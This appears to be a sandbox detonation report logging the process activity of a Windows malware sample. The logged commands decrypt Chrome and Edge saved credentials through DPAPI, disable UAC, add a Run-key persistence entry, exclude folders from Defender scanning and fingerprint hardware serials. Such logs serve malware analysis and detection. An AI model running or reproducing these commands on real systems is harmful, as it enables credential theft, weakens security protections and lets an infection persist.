"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA875.tmp" "c:\Users\Admin\AppData\Local\Temp\obnw3idv\CSC7D50F6DD4FEB43E28B3E933ADDF3E253.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,43,120,173,241,247,62,115,26,136,95,252,103,11,132,114,190,190,236,97,57,213,81,7,219,254,212,140,153,114,132,65,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,191,202,27,33,60,112,20,124,4,172,111,137,104,247,111,169,44,144,39,215,28,99,226,21,45,145,91,23,42,132,214,9,48,0,0,0,222,121,14,212,158,118,82,21,27,54,118,232,74,33,110,201,191,134,42,137,219,248,209,115,30,61,144,45,227,245,250,166,44,11,103,211,78,55,52,202,11,104,70,47,212,30,205,30,64,0,0,0,92,46,67,123,247,132,92,200,31,226,34,205,177,30,50,57,212,80,164,244,47,191,207,122,237,107,18,66,181,203,180,63,77,74,125,114,98,125,253,154,41,130,139,221,42,37,230,246,163,60,184,30,12,50,172,221,96,61,156,45,247,149,3,64), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,43,120,173,241,247,62,115,26,136,95,252,103,11,132,114,190,190,236,97,57,213,81,7,219,254,212,140,153,114,132,65,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,191,202,27,33,60,112,20,124,4,172,111,137,104,247,111,169,44,144,39,215,28,99,226,21,45,145,91,23,42,132,214,9,48,0,0,0,222,121,14,212,158,118,82,21,27,54,118,232,74,33,110,201,191,134,42,137,219,248,209,115,30,61,144,45,227,245,250,166,44,11,103,211,78,55,52,202,11,104,70,47,212,30,205,30,64,0,0,0,92,46,67,123,247,132,92,200,31,226,34,205,177,30,50,57,212,80,164,244,47,191,207,122,237,107,18,66,181,203,180,63,77,74,125,114,98,125,253,154,41,130,139,221,42,37,230,246,163,60,184,30,12,50,172,221,96,61,156,45,247,149,3,64), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,56,253,93,39,18,236,19,234,240,34,4,142,243,213,223,117,77,6,121,224,83,100,46,45,50,133,104,79,190,29,127,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,204,39,144,19,170,227,77,14,216,13,225,106,33,15,140,131,35,169,79,164,221,66,93,182,232,16,150,190,81,134,4,6,48,0,0,0,121,226,12,223,234,112,153,115,34,106,114,48,0,198,48,143,164,45,11,153,192,242,19,76,56,189,187,71,3,33,216,123,30,204,207,147,94,245,224,222,166,92,75,156,123,48,34,48,64,0,0,0,18,246,192,99,212,252,220,210,53,28,177,171,228,191,142,171,93,232,9,132,169,155,144,195,114,116,194,80,143,119,95,253,159,220,45,62,173,148,47,75,164,107,231,166,65,4,34,221,229,128,213,39,206,107,58,6,252,115,163,220,28,249,95,152), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,56,253,93,39,18,236,19,234,240,34,4,142,243,213,223,117,77,6,121,224,83,100,46,45,50,133,104,79,190,29,127,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,204,39,144,19,170,227,77,14,216,13,225,106,33,15,140,131,35,169,79,164,221,66,93,182,232,16,150,190,81,134,4,6,48,0,0,0,121,226,12,223,234,112,153,115,34,106,114,48,0,198,48,143,164,45,11,153,192,242,19,76,56,189,187,71,3,33,216,123,30,204,207,147,94,245,224,222,166,92,75,156,123,48,34,48,64,0,0,0,18,246,192,99,212,252,220,210,53,28,177,171,228,191,142,171,93,232,9,132,169,155,144,195,114,116,194,80,143,119,95,253,159,220,45,62,173,148,47,75,164,107,231,166,65,4,34,221,229,128,213,39,206,107,58,6,252,115,163,220,28,249,95,152), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2 /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.zLX4xIQdwn""

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.zLX4xIQdwn"

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2 /t REG_SZ /d "C:\ProgramData\Update.vbs" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\system32\getmac.exe

getmac /NH

C:\Users\Admin\AppData\Local\Temp\python-installer.exe

C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0

C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe

"C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=544 -burn.filehandle.self=556 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"

Network


Files


Analysis: behavioral1

Detonation Overview

Submitted

2024-11-04 02:47

Reported

2024-11-04 02:50

Platform

win7-20240903-en

Max time kernel

120s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe

"C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe"

Network

N/A

Files

N/A